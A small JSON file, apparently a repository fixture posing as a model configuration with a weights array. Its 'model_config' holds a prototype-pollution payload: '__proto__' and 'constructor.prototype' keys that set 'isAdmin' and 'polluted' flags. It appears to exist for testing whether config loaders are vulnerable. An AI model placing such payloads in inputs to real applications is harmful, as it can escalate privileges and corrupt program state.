File size: 244 Bytes
0c83835
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
{
  "model_config": {
    "__proto__": {
      "isAdmin": true,
      "polluted": "yes"
    },
    "constructor": {
      "prototype": {
        "polluted": true
      }
    }
  },
  "weights": [
    1.0,
    2.0,
    3.0
  ]
}